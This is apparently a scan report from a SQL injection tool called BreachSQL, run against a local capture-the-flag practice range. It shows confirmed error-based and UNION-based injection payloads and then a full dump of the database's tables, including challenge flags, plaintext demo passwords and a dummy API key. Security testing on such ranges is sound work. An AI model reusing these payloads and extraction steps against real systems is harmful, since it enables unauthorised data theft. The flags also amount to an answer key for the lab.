
============================================================
  BreachSQL — Scan Summary
============================================================
  Target        : http://127.0.0.1:17476/challenges/my1/users?id=1
  Duration      : 1.07s
  Requests sent : 83
  URLs crawled  : 0
  Params tested : 1
  WAF detected  : None
  Evasion used  : None
  DBMS detected : mysql

  Total findings: 6

  1. [ERROR-BASED SQLi] Confirmed
     Param   : id
     URL     : http://127.0.0.1:17476/challenges/my1/users?id=1
     Method  : GET
     DBMS    : mysql
     Payload : '
     Proof   : http://127.0.0.1:17476/challenges/my1/users?id=1%27

  2. [UNION-BASED SQLi] Confirmed
     Param    : id
     URL      : http://127.0.0.1:17476/challenges/my1/users?id=1
     Method   : GET
     Columns  : 2
     Payload  :  UNION SELECT '<marker>',NULL-- -
     Proof   : http://127.0.0.1:17476/challenges/my1/users?id=1+UNION+SELECT+%27BreachSQL_tiludd%27%2CNULL--+-

  ────────────────────────────────────────────────────────
    Extracted Data
  ────────────────────────────────────────────────────────
  3. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : VERSION()
     Value : 8.0.46

  4. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : CURRENT_USER()
     Value : firerange@%

  5. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : DATABASE()
     Value : firerange

  6. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : (SELECT GROUP_CONCAT(table_name ORDER BY table_name SEPARATOR ',') FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)
     Value : challenges,my1_notes,my1_secrets,my1_users,my2_group_targets,my2_inbox,my2_members,my3_accounts,my3_catalog,my3_items,my3_products,my3_schema_flag,my4_agent_log,my4_api_users,my4_entries,my4_hex_store,my4_numeric_store,my4_sessions,my5_hidden,my5_kwvault,my5_oob_notes,my5_reports,my5_vault

  ────────────────────────────────────────────────────────
    Table Dumps
  ────────────────────────────────────────────────────────
  [DUMP] challenges  (0 row(s))  param:id
  +--------------+------+-------+-------------+-----------+----------+--------+------+
  | challenge_id | tier | title | description | technique | endpoint | points | flag |
  +--------------+------+-------+-------------+-----------+----------+--------+------+
  +--------------+------+-------+-------------+-----------+----------+--------+------+

  [DUMP] my1_notes  (3 row(s))  param:id
  +----+--------+-------------------------------+
  | id | author | content                       |
  +----+--------+-------------------------------+
  | 1  | admin  | FIRE{my1c_double_quote_error} |
  | 2  | alice  | meeting at 3pm                |
  | 3  | bob    | remember to patch the server  |
  +----+--------+-------------------------------+

  [DUMP] my1_secrets  (2 row(s))  param:id
  +----+---------+------------------------------------+
  | id | name    | value                              |
  +----+---------+------------------------------------+
  | 1  | flag    | FIRE{my1b_union_secrets_extracted} |
  | 2  | api_key | sk-firerange-0xdeadbeef            |
  +----+---------+------------------------------------+

  [DUMP] my1_users  (4 row(s))  param:id
  +----+----------+-------------------------+-------+
  | id | username | email                   | role  |
  +----+----------+-------------------------+-------+
  | 1  | admin    | admin@firerange.local   | admin |
  | 2  | alice    | alice@firerange.local   | user  |
  | 3  | bob      | bob@firerange.local     | user  |
  | 4  | charlie  | charlie@firerange.local | user  |
  +----+----------+-------------------------+-------+

  [DUMP] my2_group_targets  (3 row(s))  param:id
  +----+-------------+-------+----------------------------+
  | id | dept        | score | flag                       |
  +----+-------------+-------+----------------------------+
  | 1  | engineering | 42    | FIRE{my2e_having_group_by} |
  | 2  | marketing   | 17    | not_the_flag               |
  | 3  | sales       | 99    | not_the_flag               |
  +----+-------------+-------+----------------------------+

  [DUMP] my2_inbox  (3 row(s))  param:id
  +----+-------+----------------------------------+
  | id | owner | message                          |
  +----+-------+----------------------------------+
  | 1  | admin | FIRE{my2d_second_step_extracted} |
  | 2  | alice | Hello Alice                      |
  | 3  | bob   | Hello Bob                        |
  +----+-------+----------------------------------+

  [DUMP] my2_members  (4 row(s))  param:id
  +----+----------+-----------+-------------------------------------+
  | id | username | password  | secret                              |
  +----+----------+-----------+-------------------------------------+
  | 1  | admin    | hunter2   | FIRE{my2a_boolean_blind_enumerated} |
  | 2  | alice    | p@ssw0rd  | alice_private_note                  |
  | 3  | bob      | qwerty123 | bob_private_note                    |
  | 4  | mallory  | evil1337  | FIRE{my2c_or_based_bypass}          |
  +----+----------+-----------+-------------------------------------+

  [DUMP] my3_accounts  (2 row(s))  param:id
  +----+----------+-------------+--------------------------------+
  | id | username | dept        | flag                           |
  +----+----------+-------------+--------------------------------+
  | 1  | jsmith   | engineering | FIRE{my3e_paren_context_blind} |
  | 2  | jdoe     | marketing   | not_the_flag                   |
  +----+----------+-------------+--------------------------------+

  [DUMP] my3_catalog  (3 row(s))  param:id
  +----+------------+----------+--------+--------+---------------------------+
  | id | title      | brand    | sku    | price  | flag                      |
  +----+------------+----------+--------+--------+---------------------------+
  | 1  | Laptop Pro | TechCo   | LP-001 | 999.99 | FIRE{my3d_five_col_union} |
  | 2  | Mouse      | TechCo   | MS-001 | 29.99  | not_the_flag              |
  | 3  | Keyboard   | TypeFast | KB-001 | 79.99  | not_the_flag              |
  +----+------------+----------+--------+--------+---------------------------+

  [DUMP] my3_items  (3 row(s))  param:id
  +----+-----------+-----------------------------+-------+
  | id | name      | description                 | price |
  +----+-----------+-----------------------------+-------+
  | 1  | Widget A  | Standard widget             | 9.99  |
  | 2  | Widget B  | Premium widget              | 19.99 |
  | 3  | Flag Item | FIRE{my3b_path_param_pwned} | 0.01  |
  +----+-----------+-----------------------------+-------+

  [DUMP] my3_products  (3 row(s))  param:id
  +----+-----------+-------------+------------------------------+
  | id | name      | category    | flag                         |
  +----+-----------+-------------+------------------------------+
  | 1  | Product X | electronics | FIRE{my3c_multicolumn_union} |
  | 2  | Product Y | clothing    | red_herring_1                |
  | 3  | Product Z | food        | red_herring_2                |
  +----+-----------+-------------+------------------------------+

  [DUMP] my3_schema_flag  (1 row(s))  param:id
  +----+--------+--------------------------+
  | id | note   | flag                     |
  +----+--------+--------------------------+
  | 1  | hidden | FIRE{my3f_schema_walker} |
  +----+--------+--------------------------+

  [DUMP] my4_agent_log  (2 row(s))  param:id
  +----+-------------+-----------------------------+
  | id | agent       | flag                        |
  +----+-------------+-----------------------------+
  | 1  | Mozilla/5.0 | FIRE{my4f_header_injection} |
  | 2  | curl/7.0    | not_the_flag                |
  +----+-------------+-----------------------------+

  [DUMP] my4_api_users  (2 row(s))  param:id
  +---------+----------+--------------------------------+
  | user_id | username | token                          |
  +---------+----------+--------------------------------+
  | 1       | system   | FIRE{my4b_json_body_injection} |
  | 2       | service  | not_a_flag_yet                 |
  +---------+----------+--------------------------------+

  [DUMP] my4_entries  (3 row(s))  param:id
  +----+--------+-------------------------------+
  | id | label  | payload                       |
  +----+--------+-------------------------------+
  | 1  | normal | benign data                   |
  | 2  | flag   | FIRE{my4a_waf_bypass_comment} |
  | 3  | decoy  | nothing_here                  |
  +----+--------+-------------------------------+

  [DUMP] my4_hex_store  (2 row(s))  param:id
  +----+--------+----------------------------+
  | id | label  | flag                       |
  +----+--------+----------------------------+
  | 1  | public | not_the_flag               |
  | 2  | secret | FIRE{my4h_hex_char_bypass} |
  +----+--------+----------------------------+

  [DUMP] my4_numeric_store  (2 row(s))  param:id
  +----+-------+-------------------------------+
  | id | value | flag                          |
  +----+-------+-------------------------------+
  | 1  | 42    | FIRE{my4d_numeric_time_blind} |
  | 2  | 1337  | not_the_flag                  |
  +----+-------+-------------------------------+

  [DUMP] my4_sessions  (2 row(s))  param:id
  +-------------+----------+-----------------------------+
  | session_id  | username | flag                        |
  +-------------+----------+-----------------------------+
  | sess_abc123 | admin    | FIRE{my4e_cookie_injection} |
  | sess_def456 | alice    | not_the_flag                |
  +-------------+----------+-----------------------------+

  [DUMP] my5_hidden  (2 row(s))  param:id
  +----+--------+------------------------------+
  | id | key    | flag                         |
  +----+--------+------------------------------+
  | 1  | secret | FIRE{my5b_crawl_and_conquer} |
  | 2  | decoy  | not_a_flag                   |
  +----+--------+------------------------------+

  [DUMP] my5_kwvault  (1 row(s))  param:id
  +----+--------+-----------------------------+
  | id | level  | flag                        |
  +----+--------+-----------------------------+
  | 1  | legend | FIRE{my5c_keyword_doubling} |
  +----+--------+-----------------------------+

  [DUMP] my5_oob_notes  (1 row(s))  param:id
  +----+---------------------------------------------------------+-------------------------------------+
  | id | note                                                    | flag                                |
  +----+---------------------------------------------------------+-------------------------------------+
  | 1  | MySQL supports LOAD_FILE() and SELECT INTO OUTFILE f... | FIRE{my5d_oob_technique_recognised} |
  +----+---------------------------------------------------------+-------------------------------------+

  [DUMP] my5_reports  (3 row(s))  param:id
  +----+--------------+---------------------------------+---------+------------+
  | id | title        | body                            | author  | status     |
  +----+--------------+---------------------------------+---------+------------+
  | 1  | Q1 Review    | Financial summary for Q1.       | admin   | published  |
  | 2  | Incident Log | Security incident details here. | secteam | classified |
  | 3  | Dev Notes    | Internal architecture notes.    | devops  | draft      |
  +----+--------------+---------------------------------+---------+------------+

  [DUMP] my5_vault  (1 row(s))  param:id
  +----+--------+------------------------------------+
  | id | level  | flag                               |
  +----+--------+------------------------------------+
  | 1  | legend | FIRE{my5a_legend_full_chain_owned} |
  +----+--------+------------------------------------+

============================================================
